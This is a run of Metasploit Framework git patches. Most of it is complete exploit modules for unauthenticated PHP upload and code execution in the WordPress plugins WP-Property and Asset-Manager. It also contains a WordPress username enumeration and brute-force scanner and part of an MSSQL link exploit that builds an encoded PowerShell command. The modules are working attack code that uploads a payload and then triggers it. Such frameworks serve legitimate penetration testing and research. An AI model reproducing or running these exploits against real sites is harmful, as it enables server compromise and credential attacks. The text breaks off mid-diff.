'http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012'], + ['URL','http://msdn.microsoft.com/en-us/library/ms188279.aspx'], + ['URL','http://www.exploit-monday.com/2011_10_16_archive.html'] + ], 'Platform' => 'win', 'DisclosureDate' => 'Jan 1 2000', 'Targets' => @@ -47,9 +62,14 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptBool.new('VERBOSE', [false, 'Set how verbose the output should be', 'false']), - OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', 'false']), - OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy to']), + OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', 'false']), + OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy to']), + OptString.new('PASSWORD', [true, 'The password for the specified username']) + ], self.class) + + register_advanced_options( + [ + OptString.new('POWERSHELL_PATH', [true, 'Path to powershell.exe', "C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe"]) ], self.class) end @@ -511,7 +531,7 @@ $winFunc::CreateThread(0,0,$x,0,0,0)" # Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors # If running on 64bit system, 32bit powershell called from syswow64 powershell_cmd = "$temppath=(gci env:temp).value;$dacode=(gc $temppath\\#{rand_filename}) -join '';if((gci env:processor_identifier).value -like\ - '*64*'){$psbits=\"C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -noprofile -encodedCommand $dacode\"} else {$psbits=\"powershell.exe\ + '*64*'){$psbits=\"#{datastore['POWERSHELL_PATH']} -noexit -noprofile -encodedCommand $dacode\"} else {$psbits=\"powershell.exe\ -noexit -noprofile -encodedCommand $dacode\"};iex $psbits" powershell_uni = Rex::Text.to_unicode(powershell_cmd) powershell_64 = Rex::Text.encode_base64(powershell_uni) From 09568f255eaa893b1260befc146fad4b290f824d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 24 Dec 2012 18:58:53 +0100 Subject: [PATCH 055/154] Submission by James Fitts --- .../unix/webapp/wp-property_upload_exec.rb | 96 +++++++++++++++++++ 1 file changed, 96 insertions(+) create mode 100644 modules/exploits/unix/webapp/wp-property_upload_exec.rb diff --git a/modules/exploits/unix/webapp/wp-property_upload_exec.rb b/modules/exploits/unix/webapp/wp-property_upload_exec.rb new file mode 100644 index 0000000000..a246b0323e --- /dev/null +++ b/modules/exploits/unix/webapp/wp-property_upload_exec.rb @@ -0,0 +1,96 @@ +require 'msf/core' +require 'msf/core/exploit/php_exe' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::PhpEXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability found in WP-Property <= 1.35.0 + WordPress plugin. By abusing the uploadify.php file, a malicious + user can upload a file to a temp directory without authentication, + which results in arbitrary code execution. + }, + 'Author' => [ + 'Sammy FORGIT', # initial discovery + 'James Fitts' # metasploit module + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: $', + 'References' => + [ + [ 'OSVDB', '82656' ], + ], + 'Payload' => + { + 'BadChars' => "\x00", + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], + [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Mar 26 2012')) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to WP-Property', '/wordpress/wp-content']) + ], self.class) + end + + def exploit + uri = target_uri.path + uri << '/' if uri[-1,1] != '/' + + peer = "#{rhost}:#{rport}" + uid = rand_text_alphanumeric(34).to_s + + @payload_name = "#{rand_text_alpha(5)}.php" + + post_data = "--#{uid}\r\n" + post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"\r\n" + post_data << "Content-Type: application/octet-stream\r\n" + post_data << "\r\n" + post_data << payload.raw + "\r\n" + post_data << "\r\n" + post_data << "--#{uid}\r\n" + post_data << "Content-Disposition: form-data; name=\"folder\"\r\n" + post_data << "\r\n" + post_data << "#{uri}plugins/wp-property/third-party/uploadify/\r\n" + post_data << "--#{uid}--\r\n" + + print_status("Uploading payload #{@payload_name} to #{peer}...") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{uri}plugins/wp-property/third-party/uploadify/uploadify.php", + 'ctype' => "multipart/form-data; boundary=#{uid}", + 'data' => post_data + }) + + if res + print_status("#{peer} responds with status: #{res.code.to_s}") + else + print_error("#{peer} not responding to our requests...") + return + end + + print_status("Executing payload #{@payload_name} on the target...") + res = send_request_raw({ + 'uri' => "#{uri}plugins/wp-property/third-party/uploadify/#{@payload_name}", + 'method' => 'GET' + }) + + if res and res.code == 404 + print_error("Target responding with a 404... Upload probably failed...") + return + end + end +end From 9020c963735724c4d49a5ad86301735723152ec1 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 24 Dec 2012 18:59:25 +0100 Subject: [PATCH 056/154] module renamed --- .../{wp-property_upload_exec.rb => wp_property_upload_exec.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/unix/webapp/{wp-property_upload_exec.rb => wp_property_upload_exec.rb} (100%) diff --git a/modules/exploits/unix/webapp/wp-property_upload_exec.rb b/modules/exploits/unix/webapp/wp_property_upload_exec.rb similarity index 100% rename from modules/exploits/unix/webapp/wp-property_upload_exec.rb rename to modules/exploits/unix/webapp/wp_property_upload_exec.rb From 0950240d9a8f3d4f0ec83e16ce4ad632b9ceb43f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 24 Dec 2012 18:59:45 +0100 Subject: [PATCH 057/154] module cleanup by juan --- .../unix/webapp/wp_property_upload_exec.rb | 89 ++++++++++--------- 1 file changed, 49 insertions(+), 40 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_property_upload_exec.rb b/modules/exploits/unix/webapp/wp_property_upload_exec.rb index a246b0323e..e015f3ca19 100644 --- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb @@ -2,7 +2,7 @@ require 'msf/core' require 'msf/core/exploit/php_exe' class Metasploit3 < Msf::Exploit::Remote - Rank = GreatRanking + Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE @@ -11,86 +11,95 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability', 'Description' => %q{ - This module exploits a vulnerability found in WP-Property <= 1.35.0 - WordPress plugin. By abusing the uploadify.php file, a malicious - user can upload a file to a temp directory without authentication, - which results in arbitrary code execution. + This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress + plugin. By abusing the uploadify.php file, a malicious user can upload a file to a + temp directory without authentication, which results in arbitrary code execution. }, - 'Author' => [ - 'Sammy FORGIT', # initial discovery - 'James Fitts' # metasploit module - ], + 'Author' => + [ + 'Sammy FORGIT', # initial discovery + 'James Fitts' # metasploit module + ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: $', 'References' => [ [ 'OSVDB', '82656' ], + [ 'BID', '53787' ], + [ 'EDB', '18987'], + [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ] ], - 'Payload' => + 'Payload' => { 'BadChars' => "\x00", }, 'Platform' => 'php', - 'Arch' => ARCH_PHP, + 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], - [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] + [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 26 2012')) register_options( [ - OptString.new('TARGETURI', [true, 'The base path to WP-Property', '/wordpress/wp-content']) + OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']) ], self.class) end + def check + uri = target_uri.path + uri << '/' if uri[-1,1] != '/' + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php" + }) + + if not res or res.code != 200 + return Exploit::CheckCode::Unknown + end + + return Exploit::CheckCode::Appears + end + def exploit uri = target_uri.path uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" - uid = rand_text_alphanumeric(34).to_s @payload_name = "#{rand_text_alpha(5)}.php" + php_payload = get_write_exec_payload(:unlink_self=>true) - post_data = "--#{uid}\r\n" - post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"\r\n" - post_data << "Content-Type: application/octet-stream\r\n" - post_data << "\r\n" - post_data << payload.raw + "\r\n" - post_data << "\r\n" - post_data << "--#{uid}\r\n" - post_data << "Content-Disposition: form-data; name=\"folder\"\r\n" - post_data << "\r\n" - post_data << "#{uri}plugins/wp-property/third-party/uploadify/\r\n" - post_data << "--#{uid}--\r\n" + data = Rex::MIME::Message.new + data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") + data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"") + post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') - print_status("Uploading payload #{@payload_name} to #{peer}...") + print_status("#{peer} - Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}plugins/wp-property/third-party/uploadify/uploadify.php", - 'ctype' => "multipart/form-data; boundary=#{uid}", + 'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php", + 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data }) - if res - print_status("#{peer} responds with status: #{res.code.to_s}") - else - print_error("#{peer} not responding to our requests...") - return + if not res or res.code != 200 or res.body !~ /#{@payload_name}/ + fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") end - print_status("Executing payload #{@payload_name} on the target...") + upload_uri = res.body + + print_status("#{peer} - Executing payload #{@payload_name}") res = send_request_raw({ - 'uri' => "#{uri}plugins/wp-property/third-party/uploadify/#{@payload_name}", + 'uri' => upload_uri, 'method' => 'GET' }) - if res and res.code == 404 - print_error("Target responding with a 404... Upload probably failed...") - return + if not res or res.code != 200 + fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution") end end end From 3d2739742965b4f95c6d87e4a43bf76995df14f4 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 24 Dec 2012 15:06:15 -0600 Subject: [PATCH 058/154] This error will still show even if we get a shell --- modules/exploits/unix/webapp/wp_property_upload_exec.rb | 4 ---- 1 file changed, 4 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_property_upload_exec.rb b/modules/exploits/unix/webapp/wp_property_upload_exec.rb index e015f3ca19..b802db106a 100644 --- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb @@ -97,9 +97,5 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => upload_uri, 'method' => 'GET' }) - - if not res or res.code != 200 - fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution") - end end end From d69e5062212244f5761488d97518540c1e09f547 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 24 Dec 2012 15:08:52 -0600 Subject: [PATCH 059/154] Final changes --- .../unix/webapp/wp_property_upload_exec.rb | 24 ++++++++++++------- 1 file changed, 16 insertions(+), 8 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_property_upload_exec.rb b/modules/exploits/unix/webapp/wp_property_upload_exec.rb index b802db106a..bbca86ec5e 100644 --- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb @@ -1,3 +1,11 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + require 'msf/core' require 'msf/core/exploit/php_exe' @@ -53,8 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ - 'method' => 'GET', - 'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php" + 'method' => 'GET', + 'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php" }) if not res or res.code != 200 @@ -80,10 +88,10 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Uploading payload #{@payload_name}") res = send_request_cgi({ - 'method' => 'POST', - 'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php", - 'ctype' => "multipart/form-data; boundary=#{data.bound}", - 'data' => post_data + 'method' => 'POST', + 'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php", + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => post_data }) if not res or res.code != 200 or res.body !~ /#{@payload_name}/ @@ -94,8 +102,8 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Executing payload #{@payload_name}") res = send_request_raw({ - 'uri' => upload_uri, - 'method' => 'GET' + 'uri' => upload_uri, + 'method' => 'GET' }) end end From 7173c9b598e779aaec11a85b3ded06267b81fe81 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 24 Dec 2012 22:46:47 +0100 Subject: [PATCH 060/154] update james email address --- modules/exploits/unix/webapp/wp_property_upload_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/wp_property_upload_exec.rb b/modules/exploits/unix/webapp/wp_property_upload_exec.rb index bbca86ec5e..311e03cbfb 100644 --- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'Sammy FORGIT', # initial discovery - 'James Fitts' # metasploit module + 'James Fitts ' # metasploit module ], 'License' => MSF_LICENSE, 'References' => From d4bdf1b6b49ac392d13bf0fd9536732493f99fde Mon Sep 17 00:00:00 2001 From: Zach Grace Date: Mon, 24 Dec 2012 16:09:03 -0600 Subject: [PATCH 061/154] Added user name enumeration based on author id enumeration --- .../scanner/http/wordpress_login_enum.rb | 63 ++++++++++++++++--- 1 file changed, 53 insertions(+), 10 deletions(-) diff --git a/modules/auxiliary/scanner/http/wordpress_login_enum.rb b/modules/auxiliary/scanner/http/wordpress_login_enum.rb index 68f741db3f..2d5c9d9c20 100644 --- a/modules/auxiliary/scanner/http/wordpress_login_enum.rb +++ b/modules/auxiliary/scanner/http/wordpress_login_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -9,6 +5,8 @@ # http://metasploit.com/ ## +require 'uri' + class Metasploit3 < Msf::Auxiliary @@ -20,12 +18,12 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'Wordpress Brute Force and User Enumeration Utility', - 'Version' => '$Revision$', - 'Description' => 'Wordpress Authentication Brute Force and User Enumeration Utility', - 'Author' => [ + 'Name' => 'Wordpress Brute Force and User Enumeration Utility', + 'Description' => 'Wordpress Authentication Brute Force and User Enumeration Utility', + 'Author' => [ 'Alligator Security Team', - 'Tiago Ferreira ' + 'Tiago Ferreira ', + 'Zach Grace ' ], 'References' => [ @@ -39,8 +37,11 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('URI', [false, 'Define the path to the wp-login.php file', '/wp-login.php']), - OptBool.new('VALIDATE_USERS', [ true, "Enumerate usernames", true ]), + OptBool.new('VALIDATE_USERS', [ true, "Validate usernames", true ]), OptBool.new('BRUTEFORCE', [ true, "Perform brute force authentication", true ]), + OptBool.new('ENUMERATE_USERNAMES', [ true, "Enumerate usernames", true ]), + OptString.new('RANGE_START', [false, 'First user id to enumerate', '1']), + OptString.new('RANGE_END', [false, 'Last user id to enumerate', '10']), ], self.class) end @@ -51,6 +52,9 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) + if datastore['ENUMERATE_USERNAMES'] + enum_usernames + end if datastore['VALIDATE_USERS'] @users_found = {} vprint_status("#{target_url} - WordPress Enumeration - Running User Enumeration") @@ -181,4 +185,43 @@ class Metasploit3 < Msf::Auxiliary rescue ::Timeout::Error, ::Errno::EPIPE end end + + def enum_usernames() + usernames = Tempfile.new('wp_enum') + begin + for i in datastore['RANGE_START']..datastore['RANGE_END'] + uri = "#{datastore['URI'].gsub(/wp-login/, 'index')}?author=#{i}" + print_status "Requesting #{uri}" + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri + }) + + if (res and res.code == 301) + uri = URI(res.headers['Location']) + uri = "#{uri.path}?#{uri.query}" + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri + }) + end + + if (res == nil) + print_error("Error getting response.") + elsif (res.code == 200) + #username = //.match(res.body.to_s)[1] + username = /href="http[s]*:\/\/.*\/author\/(.*)\/feed\//.match(res.body.to_s)[1] + usernames.write("#{username}\n") + print_good "Found user #{username} with id #{i}" + elsif (res.code == 404) + print_status "No user with id #{i} found" + else + print_error "Error, #{res.code} returned." + end + end + ensure + datastore['USER_FILE'] = usernames.path + usernames.close + end + end end From bf036c97ad520e696b03d1935867a53c088ba371 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 24 Dec 2012 23:25:25 +0100 Subject: [PATCH 062/154] added initial submission from james fitts --- .../unix/webapp/asset-manager_upload_exec.rb | 100 ++++++++++++++++++ 1 file changed, 100 insertions(+) create mode 100644 modules/exploits/unix/webapp/asset-manager_upload_exec.rb diff --git a/modules/exploits/unix/webapp/asset-manager_upload_exec.rb b/modules/exploits/unix/webapp/asset-manager_upload_exec.rb new file mode 100644 index 0000000000..c9ac5eb951 --- /dev/null +++ b/modules/exploits/unix/webapp/asset-manager_upload_exec.rb @@ -0,0 +1,100 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'msf/core/exploit/php_exe' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::PhpEXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability found in Asset-Manager <= 2.0 + WordPress plugin. By abusing the upload.php file, a malicious + user can upload a file to a temp directory without authentication, + which results in arbitrary code execution. + }, + 'Author' => [ + 'Sammy FORGIT', # initial discovery + 'James Fitts' # metasploit module + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: $', + 'References' => + [ + [ 'OSVDB', '82653' ], + [ 'BID','53809' ] + ], + 'Payload' => + { + 'BadChars' => "\x00", + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], + [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 23 2012')) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to Asset Manager', '/wordpress/wp-content']) + ], self.class) + end + + def exploit + uri = target_uri.path + uri << '/' if uri[-1,1] != '/' + + peer = "#{rhost}:#{rport}" + uid = rand_text_alphanumeric(34).to_s + + @payload_name = "#{rand_text_alpha(5)}.php" + + post_data = "--#{uid}\r\n" + post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"\r\n" + post_data << "Content-Type: application/octet-stream\r\n" + post_data << "\r\n" + post_data << payload.raw + "\r\n" + post_data << "\r\n" + post_data << "--#{uid}--\r\n" + + print_status("Uploading payload #{@payload_name} to #{peer}...") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{uri}plugins/asset-manager/upload.php", + 'ctype' => "multipart/form-data; boundary=#{uid}", + 'data' => post_data + }) + + if res + print_status("#{peer} responds with status: #{res.code.to_s}") + else + print_error("#{peer} not responding to our requests...") + return + end + + print_status("Executing payload #{@payload_name} on the target...") + res = send_request_raw({ + 'uri' => "#{uri}uploads/assets/temp/#{@payload_name}", + 'method' => 'GET' + }) + + if res and res.code == 404 + print_error("Target responding with a 404... Upload probably failed...") + return + end + end +end From ac6f34dc0909b49b9fa15d9a3774f0becc36ba2f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 24 Dec 2012 23:26:06 +0100 Subject: [PATCH 063/154] module name renamed --- ...set-manager_upload_exec.rb => wp_asset_manager_upload_exec.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/unix/webapp/{asset-manager_upload_exec.rb => wp_asset_manager_upload_exec.rb} (100%) diff --git a/modules/exploits/unix/webapp/asset-manager_upload_exec.rb b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb similarity index 100% rename from modules/exploits/unix/webapp/asset-manager_upload_exec.rb rename to modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb From 5b8492fc0dd7eded69a4758fc47c107ce31dcb40 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 24 Dec 2012 23:26:40 +0100 Subject: [PATCH 064/154] module cleanup by juan --- .../webapp/wp_asset_manager_upload_exec.rb | 71 ++++++++----------- 1 file changed, 31 insertions(+), 40 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb index c9ac5eb951..82643ad696 100644 --- a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'msf/core/exploit/php_exe' class Metasploit3 < Msf::Exploit::Remote - Rank = GreatRanking + Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE @@ -18,83 +18,74 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability', 'Description' => %q{ - This module exploits a vulnerability found in Asset-Manager <= 2.0 - WordPress plugin. By abusing the upload.php file, a malicious - user can upload a file to a temp directory without authentication, - which results in arbitrary code execution. + This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress + plugin. By abusing the upload.php file, a malicious user can upload a file to a + temp directory without authentication, which results in arbitrary code execution. }, - 'Author' => [ - 'Sammy FORGIT', # initial discovery - 'James Fitts' # metasploit module - ], + 'Author' => + [ + 'Sammy FORGIT', # initial discovery + 'James Fitts ' # metasploit module + ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: $', 'References' => [ [ 'OSVDB', '82653' ], - [ 'BID','53809' ] + [ 'BID', '53809' ], + [ 'EDB', '18993' ], + [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html' ] ], - 'Payload' => + 'Payload' => { 'BadChars' => "\x00", }, 'Platform' => 'php', - 'Arch' => ARCH_PHP, + 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], - [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] + [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, - 'DisclosureDate' => 'Jan 23 2012')) + 'DisclosureDate' => 'May 26 2012')) register_options( [ - OptString.new('TARGETURI', [true, 'The base path to Asset Manager', '/wordpress/wp-content']) + OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']) ], self.class) end def exploit uri = target_uri.path uri << '/' if uri[-1,1] != '/' - peer = "#{rhost}:#{rport}" - uid = rand_text_alphanumeric(34).to_s + payload_name = "#{rand_text_alpha(5)}.php" + php_payload = get_write_exec_payload(:unlink_self=>true) - @payload_name = "#{rand_text_alpha(5)}.php" + data = Rex::MIME::Message.new + data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"") + post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') - post_data = "--#{uid}\r\n" - post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"\r\n" - post_data << "Content-Type: application/octet-stream\r\n" - post_data << "\r\n" - post_data << payload.raw + "\r\n" - post_data << "\r\n" - post_data << "--#{uid}--\r\n" - - print_status("Uploading payload #{@payload_name} to #{peer}...") + print_status("#{peer} - Uploading payload #{payload_name}") res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}plugins/asset-manager/upload.php", - 'ctype' => "multipart/form-data; boundary=#{uid}", + 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php", + 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data }) - if res - print_status("#{peer} responds with status: #{res.code.to_s}") - else - print_error("#{peer} not responding to our requests...") - return + if not res or res.code != 200 or res.body !~ /#{payload_name}/ + fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") end - print_status("Executing payload #{@payload_name} on the target...") + print_status("#{peer} - Executing payload #{payload_name}") res = send_request_raw({ - 'uri' => "#{uri}uploads/assets/temp/#{@payload_name}", + 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}", 'method' => 'GET' }) - if res and res.code == 404 - print_error("Target responding with a 404... Upload probably failed...") - return + if res and res.code != 200 + fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed") end end end From 38f0886058dab60cb882ddfb3c1d0b9095ac7eae Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 24 Dec 2012 17:51:58 -0600 Subject: [PATCH 065/154] James has more modules that need to be updated. e-mail update. --- .../windows/browser/indusoft_issymbol_internationalseparator.rb | 2 +- modules/exploits/windows/fileformat/cytel_studio_cy3.rb | 2 +- modules/exploits/windows/fileformat/fatplayer_wav.rb | 2 +- modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb | 2 +- modules/exploits/windows/fileformat/microp_mppl.rb | 2 +- modules/exploits/windows/fileformat/mini_stream_pls_bof.rb | 2 +- modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb | 2 +- 7 files changed, 7 insertions(+), 7 deletions(-) diff --git a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb index 0ef2cacf57..beb960d75a 100644 --- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb +++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Alexander Gavrun', # Vulnerability discovery 'Dmitriy Pletnev', # Vulnerability discovery - 'James Fitts', # Metasploit module + 'James Fitts ', # Metasploit module 'juan vazquez' # Metasploit module ], 'References' => diff --git a/modules/exploits/windows/fileformat/cytel_studio_cy3.rb b/modules/exploits/windows/fileformat/cytel_studio_cy3.rb index 1e7b22bdfa..286c85880a 100644 --- a/modules/exploits/windows/fileformat/cytel_studio_cy3.rb +++ b/modules/exploits/windows/fileformat/cytel_studio_cy3.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'Luigi Auriemma', # Initial Discovery/PoC - 'James Fitts' # Metasploit Module (Thx Juan & Jeff) + 'James Fitts ' # Metasploit Module (Thx Juan & Jeff) ], 'Version' => '$Revision$', 'References' => diff --git a/modules/exploits/windows/fileformat/fatplayer_wav.rb b/modules/exploits/windows/fileformat/fatplayer_wav.rb index 26db985da8..77046403fb 100644 --- a/modules/exploits/windows/fileformat/fatplayer_wav.rb +++ b/modules/exploits/windows/fileformat/fatplayer_wav.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'James Fitts', # Original Exploit + 'James Fitts ', # Original Exploit 'dookie', # Metasploit Module ], 'Version' => '$Revision$', diff --git a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb index b2d3038e5b..3b6b83032e 100644 --- a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb +++ b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Richard Leahy', # Initial discovery 'X-h4ck', # msf module is based on his poc 'Tiago Henriques', # msf module - 'James Fitts' # clean ups + 'James Fitts ' # clean ups ], 'References' => [ diff --git a/modules/exploits/windows/fileformat/microp_mppl.rb b/modules/exploits/windows/fileformat/microp_mppl.rb index fa47452b90..1f8dbd0d58 100644 --- a/modules/exploits/windows/fileformat/microp_mppl.rb +++ b/modules/exploits/windows/fileformat/microp_mppl.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, - 'Author' => [ 'James Fitts' ], + 'Author' => [ 'James Fitts ' ], 'Version' => '$Revision$', 'References' => [ diff --git 